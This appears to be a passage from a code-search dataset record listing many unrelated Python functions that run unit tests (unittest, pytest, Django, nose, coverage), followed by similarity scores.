'1':\n print \"\\n%s\\n------------\" % module[0].upper()\n if module[1]=='clientSideAttacks':\n self.doClientSideAttacksTest( clientSideAttacks.ClientSideAttacks(self._target).getPayloads() )\n# elif module[1]=='multipleFailedLogins':\n# self.doMultipleFailedLoginsTest( multipleFailedLogins.MultipleFailedLogins(self._target).getPayloads() )\n else:\n self.doTest( module[1], eval( ('%s.%s'+'(self._target,self._cnf).getPayloads()') % (module[1], module[1][:1].upper()+module[1][1:]) ) )\n\n # Done!\n print \"\\n\\n-----------------------\"\n print \"DONE. 
Check the report.\"\n print \"-----------------------\\n\"", "def main():\n # add all new test suites per test module here\n suite_date = test_date.suite()\n suite_ng = test_ng.suite()\n suite_page = test_page.suite()\n suite_container = test_container.suite()\n\n # add the suite to be tested here\n alltests = unittest.TestSuite((suite_date,\n suite_ng,\n suite_page,\n suite_container))\n\n # run the suite\n runner = unittest.TextTestRunner()\n runner.run(alltests)", "def __main() :\n launchTests()", "def run_tests(tests):\n return [test(t) for t in tests]", "def runAllTests():\n\tttr = unittest.TextTestRunner(verbosity=3).run(suite())\n\tnTests = ttr.testsRun + len(ttr.skipped)\n\tprint(\"Report:\")\n\tprint(\"\\t\" + str(len(ttr.failures)) + \"/\" + str(nTests) + \" failed\")\n\tprint(\"\\t\" + str(len(ttr.errors)) + \"/\" + str(nTests) + \" errors\")\n\tprint(\"\\t\" + str(len(ttr.skipped)) + \"/\" + str(nTests) + \" skipped\")", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'l10n',\n 'manifest.ini')\n TestRun.run_tests(self)", "def run_tests(self):\n raise NotImplementedError", "def _run_tests(self):\n for pyunit_testcase in self.cfg.testcases:\n yield self._run_testsuite(pyunit_testcase)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def collectTests(self, global_ctx):\n pass", "def run_tests():\n test_command = \"pytest -s \" + os.path.join(root_path, \"cases\", \"test_cases.py::TestCases::test_cases\") + \" --html=\" + os.path.join(root_path, \"reports\", \"qa_testing_report.html\")\n\n subprocess.run(test_command, shell=True)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def tests(context):\n black(context)\n isort(context)\n flake8(context)\n pylint(context)\n yamllint(context)\n pydocstyle(context)\n bandit(context)\n pytest(context)\n\n print(\"All tests have passed!\")", "def test_all():\n test_prepare_text()\n test_end_chat()\n test_choose_author()\n test_choose_book()", "def RunAll():\n testfunctions = []\n for name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isfunction(obj) and name != 'RunAll':\n testfunctions.append(obj)\n\n # run all the functions\n for f in testfunctions:\n print('Running %s' % str(f))\n f()", "def runtest(self):", "def run_all(self):\n failures, errors = [], []\n\n # Run each test case registered with us and agglomerate the results.\n for case_ in self.cases:\n case_.run()\n update_results(failures, errors, case_)\n\n # Display our results.\n print_errors(errors)\n print_failures(failures)\n print_overview(errors, failures)\n\n # Exit with 0 if all tests passed, >0 otherwise.\n sys.exit(len(failures) + len(errors))", "def run_all_tests():\n successes = 0\n testsrun = 0\n testsdir = tests_dirpath()\n for test in os.listdir(testsdir):\n path = os.path.join(testsdir, test)\n if os.path.isdir(path):\n testsrun += 1\n if run_test(path):\n successes += 1\n print(\"--- %d/%d TESTS PASSED ---\" % (successes, testsrun))\n return successes == testsrun", "def unittest():\n from a6test import test_all\n test_all()", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n 
unittest.TextTestRunner(verbosity=2).run(tests)", "def runtests():\r\n\r\n app_abspath = os.path.dirname(os.path.dirname(__file__))\r\n models_abspath = os.path.join(app_abspath, 'models.py')\r\n models_exists = os.path.isfile(models_abspath)\r\n urls_abspath = os.path.join(app_abspath, 'urls.py')\r\n urls_exists = os.path.isfile(urls_abspath)\r\n views_abspath = os.path.join(app_abspath, 'views')\r\n views_exists = os.path.isdir(views_abspath)\r\n tpls_abspath = os.path.join(app_abspath, 'templates')\r\n tpls_exists = os.path.isdir(tpls_abspath)\r\n\r\n for f in [models_abspath, urls_abspath]:\r\n if os.path.isfile(f):\r\n subprocess.call('cp {} {}.orig'.format(f, f), shell=True)\r\n\r\n if views_exists:\r\n subprocess.call('cp -r {} {}.orig'.format(views_abspath, views_abspath), shell=True)\r\n\r\n if tpls_exists:\r\n subprocess.call('cp -r {} {}.orig'.format(tpls_abspath, tpls_abspath), shell=True)\r\n\r\n overwrite_project_language('ja')\r\n subprocess.call('python manage.py generatescaffold test_app I18nModel title:string', shell=True)\r\n time.sleep(1)\r\n overwrite_project_language('en-us')\r\n time.sleep(1)\r\n\r\n subprocess.call('python manage.py generatescaffold test_app GeneratedNoTimestampModel title:string description:text --no-timestamps', shell=True)\r\n time.sleep(2) # Give time for Django's AppCache to clear\r\n\r\n subprocess.call('python manage.py generatescaffold test_app GeneratedModel title:string description:text', shell=True)\r\n\r\n test_status = subprocess.call('python manage.py test --with-selenium --with-selenium-fixtures --with-cherrypyliveserver --noinput', shell=True)\r\n\r\n if models_exists:\r\n subprocess.call('mv {}.orig {}'.format(models_abspath, models_abspath), shell=True)\r\n else:\r\n subprocess.call('rm {}'.format(models_abspath), shell=True)\r\n\r\n if urls_exists:\r\n subprocess.call('mv {}.orig {}'.format(urls_abspath, urls_abspath), shell=True)\r\n else:\r\n subprocess.call('rm {}'.format(urls_abspath), shell=True)\r\n\r\n if views_exists:\r\n subprocess.call('rm -rf {}'.format(views_abspath), shell=True)\r\n subprocess.call('mv {}.orig {}'.format(views_abspath, views_abspath), shell=True)\r\n else:\r\n subprocess.call('rm -rf {}'.format(views_abspath), shell=True)\r\n\r\n if tpls_exists:\r\n subprocess.call('rm -rf {}'.format(tpls_abspath), shell=True)\r\n subprocess.call('mv {}.orig {}'.format(tpls_abspath, tpls_abspath), shell=True)\r\n else:\r\n subprocess.call('rm -rf {}'.format(tpls_abspath), shell=True)\r\n\r\n subprocess.call('rm {}/*.pyc'.format(app_abspath), shell=True)\r\n\r\n sys.exit(test_status)", "def django_run_tests():\r\n \r\n settings_py, manage_py = _CDjangoPluginActivator._instance._FindKeyFiles()\r\n loc = location.CreateFromName(settings_py)\r\n cmd = 'run_test_files(locs=\"%s\")' % settings_py\r\n wingapi.gApplication.ExecuteCommand(cmd)", "def test():\n import unittest\n tests = unittest.TestLoader().discover(tests)\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_tests():\n argument_parser = ArgumentParser(description=\"Run all tests for {{project name}}\")\n #TODO add some configuration here\n\n settings.configure(**{\n \"DATABASE_ENGINE\" : \"django.db.backends.sqlite3\",\n \"DATABASE_NAME\" : \"sqlite://:memory:\",\n \"ROOT_URLCONF\" : \"tests.urls\",\n \"TEMPLATE_LOADERS\" : (\n \"django.template.loaders.filesystem.load_template_source\",\n \"django.template.loaders.app_directory.load_template_source\",\n ),\n \"TEMPLATE_DIRS\" : (\n path(__file__).dirname() / 'templates',\n ),\n \"INSTALLED_APPS\" : 
(\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n '{{ project_name }},\n ),\n })\n call_command(\"test\")", "def test():\n import unittest\n testmodules = [\n 'bettermathlib_tests',\n 'randomwebapp_tests',\n ]\n suite = unittest.TestSuite()\n for t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\n unittest.TextTestRunner(verbosity=2).run(suite)", "def main():\n fix_sys_path()\n result = unittest.TextTestRunner(verbosity=2).run(createTestSuite())\n\n if result.testsRun != EXPECTED_TEST_COUNT:\n raise Exception(\n 'Expected %s tests to be run, not %s.' % (EXPECTED_TEST_COUNT, result.testsRun))\n\n if len(result.errors) != 0 or len(result.failures) != 0:\n raise Exception(\n \"Functional test suite failed: %s errors, %s failures of %s tests run.\" % (\n len(result.errors), len(result.failures), result.testsRun))", "def test():\n\n tests = unittest.TestLoader().discover('api/tests/', pattern='*/test_*.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_tests(self):\n manifest = manifestparser.TestManifest(\n manifests=[os.path.join(self.repository_path, self.manifest_path)],\n strict=False)\n\n tests = manifest.active_tests(**mozinfo.info)\n self._mozmill.run(tests, self.options.restart)\n\n # Whenever a test fails it has to be marked, so we quit with the correct exit code\n self.last_failed_tests = self.last_failed_tests or self._mozmill.results.fails\n\n self.testrun_index += 1", "def do_test(self):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tif not self.build['dotest']:\n\t\t\tself.log('Tests configured off, not running',level=logging.DEBUG)\n\t\t\treturn\n\t\t# Test in reverse order\n\t\tself.log('PHASE: test', level=logging.DEBUG)\n\t\tself.stop_all()\n\t\tself.start_all()\n\t\tfor module_id in self.module_ids(rev=True):\n\t\t\t# Only test if it's installed.\n\t\t\tif self.is_installed(self.shutit_map[module_id]):\n\t\t\t\tself.log('RUNNING TEST ON: ' + module_id, level=logging.DEBUG)\n\t\t\t\tself.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\tif not self.shutit_map[module_id].test(self):\n\t\t\t\t\tself.fail(module_id + ' failed on test', shutit_pexpect_child=self.get_shutit_pexpect_session_from_id('target_child').pexpect_child) # pragma: no cover\n\t\t\t\tself.logout(echo=False)", "def run_tests(virtual_env):\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n args = [\n 'python',\n 'setup.py',\n 'nosetests',\n '--with-coverage',\n '--with-xunit',\n ]\n subprocess.call(args, cwd=abspath(join(HOLLAND_ROOT, 'holland-core')), env=virtual_env)\n subprocess.call(['coverage', 'xml'], cwd=abspath(join(HOLLAND_ROOT, 'holland-core')), env=virtual_env)\n for plugin_dir in open(join(HOLLAND_ROOT, 'plugins', 'ACTIVE')):\n plugin_dir = plugin_dir.rstrip()\n plugin_path = join(HOLLAND_ROOT, 'plugins', plugin_dir)\n subprocess.call(args, cwd=plugin_path, env=virtual_env)\n subprocess.call(['coverage', 'xml'], cwd=plugin_path, env=virtual_env)\n for addon_dir in open(join(HOLLAND_ROOT, 'addons', 'ACTIVE')):\n addon_dir = addon_dir.rstrip()\n addon_path = join(HOLLAND_ROOT, 'addons', addon_dir)\n subprocess.call(args, cwd=addon_path, env=virtual_env)\n subprocess.call(['coverage', 'xml'], cwd=plugin_path, env=virtual_env)\n #return subprocess.call(args, env=virtual_env)", "def run_tests(self):\n # Charm does not defer hooks so that test is not included.\n # Trigger a package change 
which requires a restart\n self.run_package_change_test(\n 'ovn-central',\n 'ovn-central')", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def test():\r\n import unittest\r\n tests = unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests = unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests=unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_all_unit_tests():\n original = verify.parse_content\n try:\n verify.parse_content = parse_string_in_scope\n\n test_list_of()\n\n test_activity_multiple_choice()\n test_activity_free_text()\n test_activity_multiple_choice_group()\n test_activity_ast()\n\n test_assessment()\n test_assessment_ast()\n\n # test existing verifier using parsing instead of exec/compile\n verify.test_sample_assets()\n finally:\n verify.parse_content = original", "def test():\n loader = unittest.TestLoader()\n suite = loader.discover(os.path.dirname(__file__))\n runner = unittest.TextTestRunner()\n runner.run(suite)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n import tests\n tests = unittest.TestLoader().discover('tests', pattern='*tests.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def RunTest(self):\n 
self.TestLs()\n self.TestTerminate()\n self.TestMultipleProcesses()", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def run_test_suite(*args):\n test_args = list(args) or []\n execute_from_command_line([\"manage.py\", \"test\"] + test_args)", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def test():\n import unittest\n tests = unittest \n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_main(): # pragma: no cover\n RunTestsCLI.run()", "def test_generate_all_testing(self):\n pass", "def test():\n with lcd(BASEDIR):\n local('virtenv/bin/coverage run runtests.py -v2')\n local('virtenv/bin/coverage report -m')", "def run_tests(self, test_labels):\n import pytest\n\n argv = []\n if self.verbosity == 0:\n argv.append('--quiet')\n if self.verbosity == 2:\n argv.append('--verbose')\n if self.verbosity == 3:\n argv.append('-vv')\n if self.failfast:\n argv.append('--exitfirst')\n if self.keepdb:\n argv.append('--reuse-db')\n\n argv.extend(test_labels)\n return pytest.main(argv)", "def test_all_envs(func):\n register_tests(func, [func.__name__ + '_emulator',\n func.__name__ + '_verilator'])", "def run(self):\n if self.all:\n cmd = self.apply_options(self.test_all_cmd)\n self.call_and_exit(cmd)\n else:\n cmds = (self.apply_options(self.unit_test_cmd, (\"coverage\",)),)\n if self.coverage:\n cmds += (self.apply_options(self.coverage_cmd),)\n self.call_in_sequence(cmds)", "def startTestRun(self):", "def test_lint(self):\n l = self.l\n l.loadTestsFromTestCase\n l.loadTestsFromModule\n l.loadTestsFromName\n l.loadTestsFromNames", "def test_script(self) -> None:\n main()", "def run_tests(session):\n set_environment_variables(PYBAMM_ENV, session=session)\n session.run_always(\"pip\", \"install\", \"-e\", \".[all]\")\n if sys.platform == \"linux\" or sys.platform == \"darwin\":\n session.run_always(\"pip\", \"install\", \"-e\", \".[odes]\")\n session.run_always(\"pip\", \"install\", \"-e\", \".[jax]\")\n session.run(\"python\", \"run-tests.py\", \"--all\")", "def test():\n tests = unittest.TestLoader().discover('project/tests', pattern='test*.py')\n result = unittest.TextTestRunner(verbosity=2).run(tests)\n if result.wasSuccessful():\n return 0\n sys.exit(result)", "def test(test_names):\n import unittest\n if test_names:\n tests = unittest.TestLoader().loadTestsFromNames(test_names)\n else:\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def execute_tests():\n import django\n\n sys.exc_clear()\n\n os.environ[\"DJANGO_SETTINGS_MODULE\"] = \"django.conf.global_settings\"\n from django.conf import global_settings\n\n global_settings.INSTALLED_APPS = ()\n global_settings.MIDDLEWARE_CLASSES = ()\n global_settings.SECRET_KEY = \"not-very-secret\"\n\n global_settings.DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n }\n\n # http://django.readthedocs.org/en/latest/releases/1.7.html#standalone-scripts\n if django.VERSION >= (1,7):\n 
django.setup()\n\n from django.test.utils import get_runner\n test_runner = get_runner(global_settings)\n\n test_runner = test_runner()\n failures = test_runner.run_tests(['s3cache'])\n sys.exit(failures)", "def runTest(self):\n self.setUp()\n self.test_modul1()" ]
[ "0.8297117", "0.7959936", "0.7950929", "0.7797158", "0.768714", "0.766804", "0.76199144", "0.75607073", "0.7456279", "0.744708", "0.7380929", "0.7380103", "0.72950643", "0.7281221", "0.727362", "0.7181298", "0.71580607", "0.7139827", "0.7125284", "0.70671266", "0.7064775", "0.7064144", "0.7061675", "0.70427084", "0.7038519", "0.70306754", "0.700941", "0.7003991", "0.69682187", "0.6947895", "0.6941255", "0.69383717", "0.69304764", "0.6918372", "0.6917669", "0.6915974", "0.68886817", "0.68886817", "0.68886817", "0.68653417", "0.68638426", "0.6857378", "0.6847217", "0.68454874", "0.6836972", "0.683234", "0.68306434", "0.6830312", "0.68217397", "0.67976826", "0.6779681", "0.6779171", "0.6775913", "0.6768906", "0.6766041", "0.6759414", "0.67546356", "0.6753306", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6745705", "0.6733487", "0.67334163", "0.67334163", "0.67249024", "0.6722685", "0.67225426", "0.6721593", "0.67075443", "0.67040694", "0.6702716", "0.6687353", "0.6657964", "0.6657964", "0.66578114", "0.6655818", "0.66553026", "0.66426146", "0.6637389", "0.6626522", "0.6612849", "0.6580203", "0.6577367", "0.657586", "0.65680844", "0.655509", "0.65472496", "0.65414315", "0.6520224" ]
0.0
-1
Run all network tests
def net():
    suite = ServiceTestSuite()
    suite.addTest(unittest.makeSuite(Test, 'test_net'))
    return suite
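A minimal, self-contained sketch of the same pattern using only the standard unittest API; the ServiceTestSuite class from the snippet above is replaced here by a plain unittest.TestSuite, and the Test case is a hypothetical stand-in for whatever the surrounding harness provides:

import unittest

class Test(unittest.TestCase):
    # Hypothetical network check; a real suite would exercise sockets or HTTP here.
    def test_net_reachable(self):
        self.assertTrue(True)

def net():
    # Collect only the methods whose names start with 'test_net', as above.
    suite = unittest.TestSuite()
    suite.addTest(unittest.makeSuite(Test, 'test_net'))
    return suite

if __name__ == "__main__":
    unittest.TextTestRunner(verbosity=2).run(net())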
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_all():\n test_get_to()\n test_error_type()\n test_exchange()\n print(\"All tests passed.\")", "def run_all_tests():\n remove_dbs()\n run_training_tests()\n run_custom_training_tests()\n run_training_save_tests()\n run_validation_tests()\n run_feature_extraction_tests()", "def runTests(self):\n \n pass", "def runAll():\n\n loader = unittest.TestLoader()\n test_dir = pkg_resources.resource_filename('frvcpy.test','.')\n suite = loader.discover(test_dir)\n\n runner = unittest.TextTestRunner(verbosity=2)\n runner.run(suite)", "def main():\n run_test_all()", "def doAllTests(self):\n # Initial offset\n self.getAlertsFile()\n self.offset = self.getOffset(self.config.get('PATHS', 'tempfile'))\n\n # Do all tests\n # As the socket is not persistent, client side attacks have to be done before all tests\n for module in self.modules:\n # Test is performed only if selected in config.cfg\n if self.config.get('TESTS', module[1]) == '1':\n print \"\\n%s\\n------------\" % module[0].upper()\n if module[1]=='clientSideAttacks':\n self.doClientSideAttacksTest( clientSideAttacks.ClientSideAttacks(self._target).getPayloads() )\n# elif module[1]=='multipleFailedLogins':\n# self.doMultipleFailedLoginsTest( multipleFailedLogins.MultipleFailedLogins(self._target).getPayloads() )\n else:\n self.doTest( module[1], eval( ('%s.%s'+'(self._target,self._cnf).getPayloads()') % (module[1], module[1][:1].upper()+module[1][1:]) ) )\n\n # Done!\n print \"\\n\\n-----------------------\"\n print \"DONE. Check the report.\"\n print \"-----------------------\\n\"", "def tests():\n api.local('nosetests')", "def runalltests():\n doctest.testmod()", "def run_tests():\n \n test_constructor_positive()\n test_constructor_negative()\n test_game_move_positive()\n test_game_move_negative()\n test_game_move_edge()\n print(\"Congratulations ! 
You passed all the game test cases.\")", "def run_custom_training_tests():\n test_custom_training()\n test_custom_distributed_training()\n test_custom_multimodel_training()\n test_custom_distributed_multimodel_training()", "def test_run():\n # Only few steps for test\n timesteps = 128\n\n # Compute all sub testing conf\n envs = ['CartPole-v0']\n ml_platforms = ['torch', 'tf']\n agents = ['dqn', 'a2c']\n\n test_combinations = list(it.product(\n envs,\n ml_platforms,\n agents\n )\n )\n\n # Finally test them all\n for conf in test_combinations:\n env_str, ml_platform_str, agent_str = conf\n run(\n agent_str,\n ml_platform_str,\n env_str,\n 'dense',\n timesteps,\n './target/')", "def run_all_tests(self):\n for index in range(len(self.__test_set_list)):\n self.run_test(index)", "def test_get_networks(self):\n pass", "def test_core(c):\n def test_python(c, filename):\n \"\"\"Run a single python test file in tests/python.\"\"\"\n test_dir = 'tests/python'\n filepath = '{}/{}'.format(test_dir, filename)\n\n print('Restarting network before executing test {}'.format(filepath))\n rm_network(c)\n start_core(c)\n start_horizon(c)\n network(c)\n\n with c.cd(test_dir):\n print('Executing test {}'.format(filepath))\n c.run('pipenv run python {filename} \"{passphrase}\" {whitelist_seed}'.format(\n filename=filename,\n passphrase=PASSPHRASE,\n whitelist_seed=WHITELIST_SEED))\n\n test_python(c, 'test_base_reserve.py')\n test_python(c, 'test_tx_order_by_fee.py')\n test_python(c, 'test_tx_order_by_whitelist.py')\n test_python(c, 'test_tx_priority_for_whitelist_holder.py')\n test_python(c, 'test_whitelist_affected_on_next_ledger.py')\n\n # XXX obsolete\n # see source file for more information\n # test_python(c, 'test_multiple_cores.py')", "def main():\r\n test = TesterNeighbour()\r\n test.setUp()\r\n test.test_result_n()\r\n print(\"result_of_algorithm_test - passed\")", "def run_tests(self):\n raise NotImplementedError", "def tests():", "def main():\n test_network_connection()\n parser()", "def RunTest(self):\n self.TestLs()\n self.TestTerminate()\n self.TestMultipleProcesses()", "def main():\n test_runner = TestRunner(\n FLAGS.workspace, FLAGS.bench_home, imagenet_dir=FLAGS.train_data_dir)\n test_runner.run_tests(FLAGS.test_list.split(','))", "def run_all(self):\n failures, errors = [], []\n\n # Run each test case registered with us and agglomerate the results.\n for case_ in self.cases:\n case_.run()\n update_results(failures, errors, case_)\n\n # Display our results.\n print_errors(errors)\n print_failures(failures)\n print_overview(errors, failures)\n\n # Exit with 0 if all tests passed, >0 otherwise.\n sys.exit(len(failures) + len(errors))", "def run_all_unit_tests(cls):\n suites_list = []\n for test_class in cls.TESTS:\n suite = unittest.TestLoader().loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n result = unittest.TextTestRunner().run(unittest.TestSuite(suites_list))\n if not result.wasSuccessful() or result.errors:\n raise Exception(result)", "def RunTestAll(ss):\n ss.StopNow = False\n ss.TestAll()\n ss.Stopped()", "def run_test_cases(self):\n count = 1\n for test_case in self.test_cases:\n print(\"Running test case #%d\" % count)\n if test_case.name == 'RouteDistance':\n distance = self.get_distance_for_route(test_case.args)\n print('%s distance: %s' % (test_case.args, distance))\n elif test_case.name == 'RouteShortest':\n args = test_case.args.split('|')\n shortest_distance = self.find_shortest_path_between_cities(args[0], args[1])\n print(\"Shortest distance between %s and %s: %d\" 
% (args[0], args[1], shortest_distance))\n elif test_case.name == 'RouteLessThanHops':\n args = test_case.args.split('|')\n paths = self.trips_hop_constraint_bfs(args[0], args[1], int(args[2]))\n print('Paths between %s and %s with hops less than or equal to %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n elif test_case.name == 'RouteEqualHops':\n args = test_case.args.split('|')\n paths = self.trips_hop_constraint_bfs(args[0], args[1], int(args[2]), equal=True)\n print('Paths between %s and %s with hops equal to %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n elif test_case.name == 'RouteLessThanDistance':\n args = test_case.args.split('|')\n paths = self.trips_distance_constraint_bfs(args[0], args[1], int(args[2]))\n print('Paths between %s and %s with distance less than %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n else:\n raise Exception('Unknown test case: %s' % test_case.name)\n count += 1\n print()", "def run_all_tests(self) -> None:\n self.run_trt_precision_tests()\n logging.info(\"Check analysis result at: %s\", self._output_dir)", "def test_add_network(self):\n pass", "def runtest(self):", "def run(self):\n if self.all:\n cmd = self.apply_options(self.test_all_cmd)\n self.call_and_exit(cmd)\n else:\n cmds = (self.apply_options(self.unit_test_cmd, (\"coverage\",)),)\n if self.coverage:\n cmds += (self.apply_options(self.coverage_cmd),)\n self.call_in_sequence(cmds)", "def main(tests, root_uri, verbose):\n if verbose:\n rv_config.set_verbosity(verbosity=Verbosity.DEBUG)\n\n if len(tests) == 0:\n # no tests specified, so run all\n tests = list(ALL_TESTS.keys())\n else:\n # run all tests that start with the given string e.g \"chip\" will match\n # both \"chip_classification.basic\" and \"chip_classification.nochip\"\n _tests = []\n for t in tests:\n t = t.strip().lower()\n matching_tests = [k for k in ALL_TESTS.keys() if k.startswith(t)]\n _tests.extend(matching_tests)\n if len(matching_tests) == 0:\n console_error(\n f'{t} does not match any valid tests. Valid tests are: ')\n console_error(pformat(list(ALL_TESTS.keys())))\n continue\n tests = _tests\n\n console_info('The following tests will be run:')\n console_info(pformat(tests, compact=False))\n\n with get_tmp_dir() as tmp_dir:\n if root_uri:\n tmp_dir = root_uri\n\n num_failed = 0\n errors = {}\n for test_id in tests:\n test_cfg = ALL_TESTS[test_id]\n errors[test_id] = run_test(test_id, test_cfg, tmp_dir)\n if len(errors[test_id]) > 0:\n num_failed += 1\n\n for error in errors[test_id]:\n console_error(str(error))\n\n for test_id in tests:\n if test_id not in errors:\n continue\n if len(errors[test_id]) == 0:\n console_success(f'{test_id}: test passed!', bold=True)\n else:\n console_error(f'{test_id}: test failed!', bold=True)\n\n if num_failed > 0:\n console_error(\n f'Tests passed: {len(tests) - num_failed} of {len(tests)}')\n console_error('Error counts:')\n console_error(pformat({k: len(es) for k, es in errors.items()}))\n exit(1)", "def run():\n\tsubsuite_list = []\n\tfor _, modname, _ in pkgutil.iter_modules(test.__path__):\n\t\tif modname.startswith(\"test_\"):\n\t\t\tmodule = importlib.import_module('test.' 
+ modname)\n\t\t\tsubsuite = unittest.TestLoader().loadTestsFromModule(module)\n\t\t\tsubsuite_list.append(subsuite)\n\tsuite = unittest.TestSuite(subsuite_list)\n\n\tprint(\"Testing:\\n\")\n\tunittest.TextTestRunner(verbosity=2).run(suite)", "def test_generate_all_testing(self):\n pass", "def train(self, iterations=1):\n for _ in range(iterations):\n self.trainer.train()\n self.test_network()", "def runTest(self):\n self.setUp()\n self.test_NeuroPath1()", "def run_tests(self):\n setup_layers = {}\n layers_to_run = list(self.ordered_layers())\n should_resume = False\n\n while layers_to_run:\n layer_name, layer, tests = layers_to_run[0]\n for feature in self.features:\n feature.layer_setup(layer)\n try:\n self.ran += run_layer(self.options, layer_name, layer, tests,\n setup_layers, self.failures, self.errors,\n self.skipped, self.import_errors)\n except zope.testrunner.interfaces.EndRun:\n self.failed = True\n break\n except CanNotTearDown:\n if not self.options.resume_layer:\n should_resume = True\n break\n\n layers_to_run.pop(0)\n if self.options.processes > 1:\n should_resume = True\n break\n\n if self.options.stop_on_error and (self.failures or self.errors):\n break\n\n if should_resume:\n if layers_to_run:\n self.ran += resume_tests(\n self.script_parts, self.options, self.features,\n layers_to_run, self.failures, self.errors,\n self.skipped, self.cwd)\n\n if setup_layers:\n if self.options.resume_layer is None:\n self.options.output.info(\"Tearing down left over layers:\")\n tear_down_unneeded(\n self.options, (), setup_layers, self.errors, optional=True)\n\n self.failed = bool(self.import_errors or self.failures or self.errors)", "def main():\n run_test_summary1a()\n run_test_summary1c()\n run_test_summary1c()", "def runAllTests():\n\tttr = unittest.TextTestRunner(verbosity=3).run(suite())\n\tnTests = ttr.testsRun + len(ttr.skipped)\n\tprint(\"Report:\")\n\tprint(\"\\t\" + str(len(ttr.failures)) + \"/\" + str(nTests) + \" failed\")\n\tprint(\"\\t\" + str(len(ttr.errors)) + \"/\" + str(nTests) + \" errors\")\n\tprint(\"\\t\" + str(len(ttr.skipped)) + \"/\" + str(nTests) + \" skipped\")", "def __main() :\n launchTests()", "def test_all():\n test_prepare_text()\n test_end_chat()\n test_choose_author()\n test_choose_book()", "def runtests():\n #- Load all TestCase classes from desistar/test/test_*.py\n tests = desistar_test_suite()\n #- Run them\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_tests():\n good_car = UnreliableCar(\"Good Car\", 100, 90)\n bad_car = UnreliableCar(\"Bad Car\", 100, 10)\n\n for i in range(1, 15):\n print(\"Attempting to drive {}km:\".format(i))\n print(\"{:12} drove {:2}km\".format(good_car.name, 